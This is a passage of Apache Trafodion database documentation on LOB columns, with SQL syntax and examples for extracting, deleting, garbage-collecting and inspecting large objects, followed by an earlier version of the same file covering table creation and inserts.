raised.\r\n\r\n* `CREATE, APPEND`\r\n+\r\nIf the target file exists, Trafodion will append to it. \r\n+\r\nIf the target file does not exist, Trafodion will create a file and append to it. \r\n\r\n[#considerations]\r\n==== Considerations\r\n\r\nIf the target file exists, the `OPTION` must be specified, or else an error will be raised. This is the default behavior.\r\n\r\nIf the target file does not exist, you can create a target file by specifying the `OPTION`. \r\n\r\n[#examples]\r\n==== Examples\r\n\r\n* This example extracts LOB to the tlob130_txt1.txt:\r\n\r\n+\r\n```\r\nEXTRACT LOBTOFILE (LOB 'LOBH00000200010520117997292583625519884121437206093184618212317486018305654020\"TRAFODION\".\"LOB130\"', 'tlob130_txt1.txt');\r\nSuccess. Targetfile:tlob130_txt1.txt Length: 19\r\n```\r\n\r\n* This example extracts LOB to the tlob130_deep.jpg:\r\n+\r\n```\r\nEXTRACT LOBTOFILE (LOB 'LOBH00000200010520117997292583681719884121437210516812518212317486062586654020\"TRAFODION\".\"LOB130\"', \r\nSuccess. Targetfile:tlob130_deep.jpg Length: 159018\r\n```\r\n\r\n[#extracting lob data into a user specified buffer]\r\n=== Extracting Lob Data into a User Specified Buffer\r\n\r\nExtract from a LOB column into a target user buffer of a specified size. The Trafodion engine will retrieve exactly the amount of requested data. The user\/application will be responsible for redriving the extract until end of data. Then the extracted buffer data can be written to files or another location as the application chooses. \r\n\r\nExtract LOB data into a user specified buffer like a cursor until EOD is returned. For this method, the user specifies an input buffer and specifies the input length in an in\/out variable. \r\n\r\nFor each execution of the extract, Trafodion will return SUCCESS, ERROR or EOD. \r\nFor the cases of SUCCESS or EOD, a length will also be returned to the user, so the user knows exactly how much data was actually extracted and returned. \r\n\r\n[#syntax]\r\n==== Syntax\r\n\r\n```\r\nEXTRACT LOBTOBUFFER (LOB 'lob handle as quoted string', LOCATION lob output buffer address as long, SIZE input\/output address of length container as long)\r\n```\r\n\r\n[#extracting lob length for a given lob handle]\r\n=== Extracting Lob Length for a Given Lob Handle\r\n\r\nExtract from a LOB column straight into an on-platform linux or HDFS file in one shot. \r\n\r\n[#syntax]\r\n==== Syntax\r\n\r\n```\r\nEXTRACT LOBLENGTH (LOB 'lob handle as quoted string'[, LOCATION address of length container for lob length])\r\n```\r\n\r\n[#semantics]\r\n==== Semantics\r\n\r\n* `_LOCATION address of length container for lob length_`\r\n\r\n+\r\nThis is used by programs\/applications that will use this syntax to retrieve the LOB length prior to extracting data. The address should be an address of a 64-bit container that will hold the LOB length. \r\n+\r\nIf the length is omitted or 0, only the status message is returned that displays the length.\r\n\r\n[#examples]\r\n==== Examples\r\n\r\n* This example extracts LOB length and returns 30.\r\n\r\n+\r\n```\r\nEXTRACT LOBLENGTH (LOB 'LOBH0000000800030554121478481170502119554121478546064413218212330526373762019024\"TRAFODION\".\"TESTEXTLOB\"');\r\nLOB Length: 30\r\n--- SQL operation complete.\r\n```\r\n\r\n* This example extracts LOB length and returns 4.\r\n\r\n+\r\n```\r\nEXTRACT LOBLENGTH (LOB 'LOBH00000200010423909193650389683319694857010382259683718212310961182290216021\"TRAFODION\".\"SEABASE\"');\r\nLOB Length: 4\r\n--- SQL operation complete.\r\n```\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\n* LOB Max Extract Data Length\r\n+\r\nCQD `LOB_OUTPUT_SIZE` (default 32000) controls the maximum data length that can be extracted.\r\n\r\n* LOB Max Extract Chunk Length\r\n+\r\nCQD `LOB_MAX_CHUNK_MEM_SIZE` (512 MB expressed in bytes [536870912]) controls the maximum chunk of data that can be read from HDFS into memory and written to the target file location. \r\n\r\n* LOB Max Size\r\n+\r\nCQD `LOB_MAX_SIZE` (default 10G expressed in M [10000M]).\r\n\r\n* Extract Target Locations\r\n+\r\nThe file to extract to can be a local linux file or a local HDFS file.\r\n\r\n[#deleting column from a sql table containing lob columns]\r\n== Deleting Column from a SQL Table Containing LOB columns\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nDELETE lob-column-name FROM table-name [WHERE CLAUSE]\r\n```\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\nWhen one or more rows containing LOB columns are deleted from LOB table, only the metadata information is dropped and the hdfs data remains as it is. The references to the lob data are removed from the lob descriptor file. \r\n\r\nThis mechanism has not been implemented yet as a separate utility but it is triggered as a part of insert, update and append operations. For more information, see <<garbage collection,Garbage Collection>>.\r\n\r\n[#dropping a sql table containing lob columns ]\r\n== Dropping a SQL Table Containing LOB Columns \r\n\r\nDrop works like any other drop table. All dependent tables are deleted. All files in hdfs (data and descriptor) files are also deleted.\r\n\r\nFor more information, see <<drop_table_statement,DROP TABLE Statement>> in http:\/\/trafodion.incubator.apache.org\/docs\/sql_reference\/index.html[Trafodion SQL Reference Manual].\r\n\r\n[#garbage collection]\r\n== Garbage Collection\r\n\r\nWhen a lob datafile for a column has reached a certain limit, defined by a CQD `LOB_GC_LIMIT_SIZE`, then a compaction is triggered automatically. +\r\nThe default Garbage Collection (GC) Limit is 10GB and can be changed if needed. \r\n\r\nThe need for GC arises because when a delete operation or an update operation is performed, the old data black in the hdfs file will be left as unused. +\r\nIn the case of update, the old data will be left as unused and the new data will be written into a new section, so all these \u201choles\u201d in the LOB data file are needlessly occupying space. \r\n\r\nThe LOB descriptor chunks file is looked at to see which ranges and offsets are actually used. The LOB datafile is temporarily saved. The compaction is done into a new tempfile. When the sections have all been copied into the tempfile, Trafodion will delete the existing lob data file and rename the tempfile. \r\n\r\nFinally, the saved copy of the LOB datafile is dropped. The saved copy is there just in case you need to fall back to it in case of an error. Since this operation is triggered as part of an IUD operation, a definite slowdown will occur for that insert\/update operation compared to subsequent inserts\/updates. \r\n\r\nAlso, each lob column of a table can be compacted separately as needed. GC does not have to be done to all columns of the LOB table all at once. \r\n\r\nNOTE: Currently the GC is done in the same transaction as the transaction being used for the insert or update operation. If any part of the GC fails, then the entire transaction is aborted. \r\n\r\nWhen Trafodion has support for local transactions, Trafodion will do the GC in a separate transaction or in a separate process, so you can fail the GC with a warning and allow the insert to go through. \r\n\r\nSetting the CQD `LOB_GC_LIMIT_SIZE` to 0 would prevent GC from occurring.\r\n\r\n[#cleanup of a sql table containing lob columns]\r\n== Cleanup of a SQL Table Containing LOB Columns\r\n\r\nCleanup works like cleanup of any other table. The command ensures all dependent SQL LOB tables and hdfs files are dropped ignoring errors if any.\r\n\r\nFor more information, see <<cleanup_statement,CLEANUP Statement>> in http:\/\/trafodion.incubator.apache.org\/docs\/sql_reference\/index.html[Trafodion SQL Reference Manual].\r\n\r\n[#showddl for lob]\r\n== SHOWDDL for LOB\r\n\r\nSHOWDDL for LOB with a special option will show all the dependent objects, names and details about the table.\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nSHOWDDL table-name, LOB DETAILS\r\n```\r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example displays the details of the table t1ob1.\r\n\r\n+\r\n\r\n```\r\n>>SHOWDDL tlob1, LOB DETAILS;\r\nCREATE TABLE TRAFODION.SEABASE.TLOB1\r\n (\r\n C1 INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , C2 BLOB DEFAULT NULL NOT SERIALIZED\r\n , PRIMARY KEY (C1 ASC)\r\n )\r\n;\r\n\r\nLOB Metadata\r\n============\r\n\r\nCREATE TABLE TRAFODION.SEABASE.LOBMD_04239091936503896833\r\n (\r\n LOBNUM SMALLINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , STORAGETYPE SMALLINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOCATION VARCHAR(4096) CHARACTER SET ISO88591 COLLATE DEFAULT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , PRIMARY KEY (LOBNUM ASC)\r\n )\r\n;\r\n\r\n************************************************\r\nLobNum: 1\r\n\r\nData Storage\r\n============\r\n\r\nLocation: \/user\/trafodion\/lobs\r\nDataFile: LOBP_04239091936503896833_0001\r\n\r\nLOB Descriptor Handle\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SEABASE.\"LOBDescHandle_04239091936503896833_0001\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , NUMCHUNKS INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOBLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n )\r\n STORE BY (DESCPARTNKEY ASC)\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\nLOB Descriptor Chunks\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SEABASE.\"LOBDescChunks_04239091936503896833_0001\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DESCSYSKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKNUM INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , INTPARAM LARGEINT DEFAULT NULL SERIALIZED\r\n , STRINGPARAM VARCHAR(400) CHARACTER SET ISO88591 COLLATE DEFAULT DEFAULT NULL SERIALIZED\r\n , PRIMARY KEY (DESCPARTNKEY ASC, DESCSYSKEY ASC, CHUNKNUM ASC)\r\n )\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n--- SQL operation complete.\r\n```\r\n\r\n* This example displays the details of the table tlob130ext.\r\n\r\n+\r\n\r\n```\r\n>>CREATE TABLE tlob130ext (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB STORAGE 'EXTERNAL', primary key (c1));\r\n\r\n--- SQL operation complete.\r\n\r\n>>SHOWDDL tlob130ext, LOB DETAILS;\r\n\r\nCREATE TABLE TRAFODION.SCH.TLOB130EXT\r\n (\r\n C1 INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , C2 BLOB DEFAULT NULL NOT SERIALIZED\r\n , C3 CLOB DEFAULT NULL NOT SERIALIZED\r\n , C4 BLOB DEFAULT NULL NOT SERIALIZED\r\n , PRIMARY KEY (C1 ASC)\r\n )\r\n;\r\n\r\nLOB Metadata\r\n============\r\n\r\nCREATE TABLE TRAFODION.SCH.LOBMD__04474425229029907479\r\n (\r\n LOBNUM SMALLINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , STORAGETYPE SMALLINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOCATION VARCHAR(4096) CHARACTER SET ISO88591 COLLATE DEFAULT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , PRIMARY KEY (LOBNUM ASC)\r\n )\r\n;\r\n\r\n************************************************\r\nLobNum: 1\r\n\r\nData Storage\r\n============\r\n\r\nLocation: \/user\/trafodion\/lobs\r\nDataFile: LOBP_04474425229029907479_0001\r\n\r\nLOB Descriptor Handle\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescHandle__04474425229029907479_0001\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , NUMCHUNKS INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOBLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n )\r\n STORE BY (DESCPARTNKEY ASC)\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\nLOB Descriptor Chunks\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescChunks__04474425229029907479_0001\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DESCSYSKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKNUM INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DATAOFFSET LARGEINT DEFAULT NULL SERIALIZED\r\n , STRINGPARAM VARCHAR(400) CHARACTER SET ISO88591 COLLATE DEFAULT DEFAULT NULL SERIALIZED\r\n , PRIMARY KEY (DESCPARTNKEY ASC, DESCSYSKEY ASC, CHUNKNUM ASC)\r\n )\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n************************************************\r\nLobNum: 2\r\n\r\nData Storage\r\n============\r\n\r\nLocation: \/user\/trafodion\/lobs\r\nDataFile: LOBP_04474425229029907479_0002\r\n\r\nLOB Descriptor Handle\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescHandle__04474425229029907479_0002\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , NUMCHUNKS INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOBLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n )\r\n STORE BY (DESCPARTNKEY ASC)\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\nLOB Descriptor Chunks\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescChunks__04474425229029907479_0002\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DESCSYSKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKNUM INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DATAOFFSET LARGEINT DEFAULT NULL SERIALIZED\r\n , STRINGPARAM VARCHAR(400) CHARACTER SET ISO88591 COLLATE DEFAULT DEFAULT NULL SERIALIZED\r\n , PRIMARY KEY (DESCPARTNKEY ASC, DESCSYSKEY ASC, CHUNKNUM ASC)\r\n )\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n************************************************\r\nLobNum: 3\r\n\r\nData Storage\r\n============\r\n\r\n<External HDFS location>\r\n<External HDFS file>\r\n\r\nLOB Descriptor Handle\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescHandle__04474425229029907479_0003\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , NUMCHUNKS INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , LOBLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n )\r\n STORE BY (DESCPARTNKEY ASC)\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\nLOB Descriptor Chunks\r\n=====================\r\n\r\nCREATE TABLE TRAFODION.SCH.\"LOBDescChunks__04474425229029907479_0003\"\r\n (\r\n DESCPARTNKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DESCSYSKEY LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKNUM INT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , CHUNKLEN LARGEINT NO DEFAULT NOT NULL NOT DROPPABLE SERIALIZED\r\n , DATAOFFSET LARGEINT DEFAULT NULL SERIALIZED\r\n , STRINGPARAM VARCHAR(400) CHARACTER SET ISO88591 COLLATE DEFAULT DEFAULT NULL SERIALIZED\r\n , PRIMARY KEY (DESCPARTNKEY ASC, DESCSYSKEY ASC, CHUNKNUM ASC)\r\n )\r\n SALT USING 8 PARTITIONS\r\n;\r\n\r\n--- SQL operation complete.\r\n```\r\n\r\n[#get lob statistics for a lob table ]\r\n== Get Lob Statistics for a LOB Table \r\n\t\r\nThere are two ways to get lob statistics for a lob table:\r\n\r\n* Get Statement: the lob information is formatted for human readability.\r\n* Select Statement: the lob information is formatted for machine readability.\r\n\r\n\r\n[#get statment]\r\n=== Get Statement\r\n\r\n[#syntax]\r\n==== Syntax\r\n\r\n```\r\nGET LOB STATS FOR TABLE table-name;\r\n```\r\n\r\n[#examples]\r\n==== Examples\r\n\r\n* This Get Statement displays statistics for the table tlob130gt2.\r\n\r\n+\r\n\r\n```\r\n>>CREATE TABLE tlob130gt2 (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB STORAGE 'EXTERNAL', PRIMARY KEY (c1));\r\n\r\n--- SQL operation complete.\r\n\r\n>>GET LOB STATS FOR TABLE tlob130gt2;\r\n\r\nLob Information for table: \"TRAFODION\".LOB130.TLOB130GT2\r\n=========================\r\n\r\nColumnName: C2\r\nLob Location: \/user\/trafodion\/lobs\r\nLOB Data File: LOBP_07468755986685501835_0001\r\nLOB EOD: 0\r\nLOB Used Len: 0\r\nColumnName: C3\r\nLob Location: \/user\/trafodion\/lobs\r\nLOB Data File: LOBP_07468755986685501835_0002\r\nLOB EOD: 0\r\nLOB UsedLen: 0\r\nColumnName: C4\r\nLob Location: External HDFS Location\r\nLOB Data File: External HDFS File\r\nLOB EOD: 0\r\nLOB Used Len: 0\r\n--- SQL operation complete.\r\n```\r\n\r\n[#select statment]\r\n=== Select Statement\r\n\r\n[#syntax]\r\n==== Syntax\r\n\r\n```\r\nSELECT * FROM TABLE(LOB STATS table-name);\r\n```\r\n\r\n[#examples]\r\n==== Examples\r\n\r\n* This Select Statement displays statistics for the table tlob130gt.\r\n\r\n+\r\n\r\n```\r\n>>CREATE TABLE tlob130gt (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB, PRIMARY KEY (c1));\r\n\r\n--- SQL operation complete.\r\n\r\n>>SELECT left(trim(catalog_name) || '.' || trim(schema_name) || '.' || trim(object_name) , 20), \r\nleft(trim(column_name),5), \r\nleft(trim(lob_location),5), \r\nleft(trim(lob_data_file),20),\r\nLOB_DATA_FILE_SIZE_EOD,\r\nLOB_DATA_FILE_SIZE_USED \r\nFROM TABLE(lob stats(tlob130gt));\r\n\r\n(EXPR) (EXPR) (EXPR) (EXPR) LOB_DATA_FILE_SIZE_EOD LOB_DATA_FILE_SIZE_USED\r\n------ ------ ------ ------ ---------------------- ----------------------\r\n\r\nTRAFODION.SCH.TLOB13 C2 \/user\/trafodion\/lobs LOBP_044744252290302 15 10\r\nTRAFODION.SCH.TLOB13 C3 \/user\/trafodion\/lobs LOBP_044744252290302 15 10\r\nTRAFODION.SCH.TLOB13 C4 \/user\/trafodion\/lobs LOBP_044744252290302 45 30\r\n\r\n--- 3 row(s) selected.\r\n```\r\n\r\n* This Select Statement displays statistics for the table tlob130gt2.\r\n\r\n+\r\n\r\n```\r\n>>CREATE TABLE tlob130gt2 (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB STORAGE 'EXTERNAL', PRIMARY KEY (c1));\r\n\r\n--- SQL operation complete.\r\n\r\n>>SELECT left(trim(catalog_name) || '.' || trim(schema_name) || '.' || trim(object_name), 20), \r\nleft(trim(column_name),5), \r\nleft(trim(lob_location),15), \r\nleft(trim(lob_data_file),20),\r\nLOB_DATA_FILE_SIZE_EOD,\r\nLOB_DATA_FILE_SIZE_USED \r\nFROM TABLE(lob stats(tlob130gt2));\r\n\r\n(EXPR) (EXPR) (EXPR) (EXPR) LOB_DATA_FILE_SIZE_EOD LOB_DATA_FILE_SIZE_USED\r\n------ ------ ------ ------ ---------------------- ----------------------\r\n\r\nTRAFODION.SCH.TLOB13 C2 \/user\/trafodion\/lobs LOBP_044744252290300\u00a0 0 0\r\nTRAFODION.SCH.TLOB13 C3 \/user\/trafodion\/lobs LOBP_044744252290300 0 0\r\nTRAFODION.SCH.TLOB13 C4 External HDFS Location\u00a0External HDFS File 0 0\r\n\r\n--- 3 row(s) selected.\r\n```","old_contents":"\/\/\/\/\r\n\/**\r\n* @@@ START COPYRIGHT @@@\r\n*\r\n* Licensed to the Apache Software Foundation (ASF) under one\r\n* or more contributor license agreements. See the NOTICE file\r\n* distributed with this work for additional information\r\n* regarding copyright ownership. The ASF licenses this file\r\n* to you under the Apache License, Version 2.0 (the\r\n* \"License\"); you may not use this file except in compliance\r\n* with the License. You may obtain a copy of the License at\r\n*\r\n* http:\/\/www.apache.org\/licenses\/LICENSE-2.0\r\n*\r\n* Unless required by applicable law or agreed to in writing,\r\n* software distributed under the License is distributed on an\r\n* \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\r\n* KIND, either express or implied. See the License for the\r\n* specific language governing permissions and limitations\r\n* under the License.\r\n*\r\n* @@@ END COPYRIGHT @@@\r\n*\/\r\n\/\/\/\/\r\n\r\n[#working with lobs]\r\n= Working with LOBs\r\n\r\n[#creating a sql table with lob columns]\r\n== Creating a SQL Table with LOB Columns\r\n\r\nWhen creating a SQL table with LOB columns, following relevant tables and files are created as well:\r\n\r\n* One LOB MD table.\r\n* Two dependent descriptor tables.\r\n* HDFS data file (locates at \/user\/trafodion\/lobs) for each column.\r\n\r\n[#syntax]\r\n== Syntax\r\n\r\n```\r\nCREATE TABLE table-name (column-spec[, column-spec]\u2026)\r\n```\r\n\r\n```\r\ncolumn-spec is:\r\nlob-column-spec | \r\nother-column-spec\r\n\r\nlob-column-spec is:\r\ncolumn-name {lob-data-type}[column-constraint]\r\n\r\nother-column-spec is:\r\ncolumn-name {data-type}[column-constraint]\r\n\r\nlob-data-type is:\r\nBLOB | CLOB [({numeric literal} [unit])] [STORAGE 'storage literal']\r\n\r\nunit is:\r\nempty | \r\nK | \r\nM | \r\nG \r\n```\r\n\r\n[#semantics]\r\n=== Semantics\r\n\r\n* `_storage literal_`\r\n\r\n+\r\nCurrently Trafodion only supports `'EXTERNAL'` here. \r\n\r\n+\r\nExternal LOB object that are not managed by Trafodion.\r\n\r\n* `_empty_`\r\n\r\n+\r\nNumber of bytes specified by the numeric literal.\r\n\r\n* `_K_`\r\n\r\n+\r\nNumeric literal value * 1024.\r\n\r\n* `_M_`\r\n\r\n+\r\nNumeric literal value * 1024 * 1024.\r\n\r\n* `_G_`\r\n\r\n+\r\nNumeric literal value * 1024 * 1024 * 1024.\r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example creates a table tlob1 with 2 columns and primary key on the c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob1 (c1 INT NOT NULL, c2 BLOB, PRIMARY KEY (c1));\r\n```\r\n\r\n* This example creates a table tlob2 with 3 columns and primary key on the c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob2 (c1 INT NOT NULL, c2 BLOB, c3 CLOB, PRIMARY KEY (c1));\r\n```\r\n\r\n* This example creates a table tlob130txt_limit50 with 2 columns and primary key on the c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob130txt_limit50 (c1 INT NOT NULL, c2 CLOB(50), PRIMARY KEY (c1));\r\n```\r\n\r\n* This example creates a table tlob130bin_limit1K with 2 columns and primary key on the c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob130bin_limit1K (c1 INT NOT NULL, c2 BLOB(1 K), PRIMARY KEY (c1));\r\n```\r\n\r\n* This example creates a table tlob130ext with 4 columns and primary key on the c1.\r\n\r\n+\r\n\r\n```\r\nCREATE TABLE tlob130ext (c1 INT NOT NULL, c2 BLOB, c3 CLOB, c4 BLOB STORAGE 'EXTERNAL', PRIMARY KEY (c1));\r\n```\r\n\r\n[#hdfs location of lob data]\r\n=== HDFS Location of LOB Data\r\n\r\nWhen a LOB table is created, the underlying LOB data needs to be stored in HDFS. It is in the \/user\/trafodion\/lobs by default. \r\n\r\nAll columns of a table that are declared as LOB types will have all their data in one file derived from the table's Object UID and the LOB number of that column which gets assigned during creation.\r\n\r\nThe following is a LOB file with 2 columns you will see 2 files in HDFS:\r\n\r\n\/user\/trafodion\/lobs\/LOBP_03683514167332904796_0001\r\n\r\n\/user\/trafodion\/lobs\/LOBP_03683514167332904796_0002\r\n\r\nAs rows are added to this table, the LOB data for each row gets appended to the corresponding column\u2019s LOB data file. \r\n\r\n[#inserting into a sql table containing lob columns]\r\n== Inserting into a SQL Table Containing LOB Columns\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nINSERT INTO table-name [(target-col-list)] insert-source\r\n```\r\n\r\n```\r\ntarget-col-list is: \r\ncolname[, colname]... \r\n\r\ninsert-source is: \r\nVALUES(column-expr[, column-expr]...)\r\n\r\ncolumn-expr is:\r\nlob-query-expr |\r\nother-query-expr\r\n\r\nlob-query-expr is: \r\nNULL | ? |\r\nEMPTY_BLOB() |\r\nEMPTY_CLOB() | \r\nSTRINGTOLOB('string literal expression') |\r\nFILETOLOB('lob source file name') |\r\nBUFFERTOLOB(LOCATION lob source buffer address, LENGTH lob length value) |\r\nEXTERNALTOLOB('external lob source file name') \r\n\r\nlob source file name is:\r\nhdfs:\/\/\/{local hdfs file name} | \r\n{local linux file name} |\r\n{file:\/\/\/linux file name} \r\n\r\nexternal lob source file name is: \r\nhdfs:\/\/\/{local hdfs file name}\r\n``` \r\n[#semantics]\r\n=== Semantics\r\n\r\n* `_other-query-expr_`\r\n+\r\nFor the syntax and description of `_other-query-expr_`, see the `_query-expr_` in the <<select_statement,SELECT Statement>>.\r\n\r\n* `_EMPTY_BLOB(), EMPTY_CLOB()_`\r\n+\r\nReturns an empty LOB handle. \r\n\r\n* `_STRINGTOLOB_`\r\n+\r\nConverts a simple string literal into LOB format. \r\n\r\n** `_string literal expression_`\r\n+\r\nis a series of characters enclosed in single quotes.\r\n\r\n* `_FILETOLOB_`\r\n+\r\nConverts data from a local linux\/hdfs file into LOB format.\r\n\r\n* `_BUFFERTOLOB_`\r\n+\r\nTakes an address and a size of an input buffer, and converts the data pointed to by that buffer into LOB. \r\n\r\n** `_lob source buffer address_`\r\n+\r\nThe long value of the user buffer address in int64.\r\n\r\n** `_lob length value_`\r\n+\r\nThe length of the user specified lob buffer in int64.\r\n\r\n[#considerations]\r\n=== Considerations\r\n\r\nThe source for inserting into a LOB can be any of the following:\r\n\r\n* A parameter.\r\n+\r\nAn unnamed parameter can be used to prepare a statement and then during an execution, either a function or a simple string parameter can be passed in which will be converted to LOB data.\r\n\r\n* `EMPTY_BLOB()` or `EMPTY_CLOB()` \r\n\r\n** If `EMPTY_BLOB()` or `EMPTY_CLOB()` is specified, then a dummy lob handle is created. \r\n\r\n*** No data is associated with the empty LOBs yet, but these dummy LOB handles can later be used to populate with new LOB data. If the LOB had data previously associated with it, it will be erased.\r\n\r\n*** The dummy LOB handle will get the same datatype as the underlying column.\r\n+\r\nFor example, if the LOB column was defined as `'EXTERNAL'` during table creation, then the LOB column gets that type. If it\u2019s not defined, then it is considered as a regular LOB. \r\n\r\n** An empty LOB is distinct from a LOB containing a string of length zero or a null LOB.\r\n\r\n* An in-memory LOB which is simple string data. \r\n+\r\nTo insert a string literal, you need to provide `STRINGTOLOB('string literal expression')`.\r\n\r\n* An on-platform file (linux\/hdfs file) containing binary or text data.\r\n+\r\nTo insert an on-platform file, you need to provide `FILETOLOB('lob source file name')`. \r\n\r\n* A user buffer of a specified length allocated in user space.\r\n+\r\nTo insert a buffer, you need to provide the address and size of the buffer.\r\n\r\n* An external LOB.\r\n+ \r\nWhen an external LOB is specified via `EXTERNALTOLOB('external lob source file name')`, the data associated with the external HDFS file is not transferred into the Trafodion LOB. Instead, Trafodion stores the file path\/handle of the external file. \r\n+\r\nFor example, if you have a directory of pictures, you can specify the full hdfs path to each picture file to this function and the path will get stored in the Trafodion table. Later during retrieval, the file name will be used to go to the actual file to retrieve the data. \r\n\r\n[#examples]\r\n=== Examples\r\n\r\n* This example uses the `STRINGTOLOB` function that converts a simple string literal into LOB format before inserting.\r\n+\r\n```\r\nINSERT INTO tlob1 VALUES(1,stringtolob('inserted row'));\r\n```\r\n\r\n* This example uses the `FILETOLOB` function that converts data from a local file into LOB format, and stores all data into HDFS associated with that value.\r\n+\r\n```\r\nINSERT INTO tlob130txt1 VALUES(1,filetolob('lob_input_a1.txt'));\r\n```\r\n\r\n* This example takes an int64 value as an input which is an address to a buffer and a size parameter. The buffer contents are converted to LOB format and stored in HDFS.\r\n+\r\n```\r\nINSERT INTO tlob1 VALUES (1, buffertolob(LOCATION 124647474, SIZE 2048));\r\n```\r\n\r\n* This example uses different functions to convert strings, files, external lob into LOB data. The EXTERNALTOLOB function takes an external file. \r\n+\r\n```\r\nINSERT INTO tlob130ext VALUES(1, STRINGTOLOB('first lob'), \r\nFILETOLOB('hdfs:\/\/\/lobs\/lob_input_a1.txt'), \r\nEXTERNALTOLOB('hdfs:\/\/\/lobs\/lob_input_a1.txt'));\r\n```\r\n\r\n* This example uses a parameter.\r\n+\r\n```\r\nPREPARE S FROM INSERT INTO t130lob2 VALUES (1, ?);\r\nEXECUTE S USING 'fgfgfhfhfhfhhfhfhfhjfkkfkffllflflfll';\r\n```\r\n\r\n* This example uses the `EMPTY_BLOB` function to insert an empty lob and creates a dummy lob handle. \r\n+\r\n```\r\nINSERT INTO t130lob2 VALUES (1, empty_blob());\r\n```\r\n\r\n[#inserting into a sql table containing lob columns using select clause]\r\n== Inserting into a SQL Table Containing LOB Columns Using Select Clause\r\n\r\n[#syntax]\r\n=== Syntax\r\n\r\n```\r\nINSERT INTO target-table [(target-col-list-expr)] SELECT [source-col-list-expr] FROM source-table\r\n```\r\n\r\n```\r\ntarget-col-list-expr is: \r\ntarget-colname[, target-colname]...\r\n\r\ntarget-colname is: \r\nlob-column-name |\r\nother-column-name\r\n\r\nsource-col-list-expr is: \r\nsource-colname[, source-colname]...\r\n\r\nsource-colname is: \r\nhive varchar column name | \r\ntrafodion varchar column name | \r\ntrafodion char column name |\r\ntrafodion lob column name\r\n\r\nsource-table is: \r\nhive table |\r\ntrafodion table 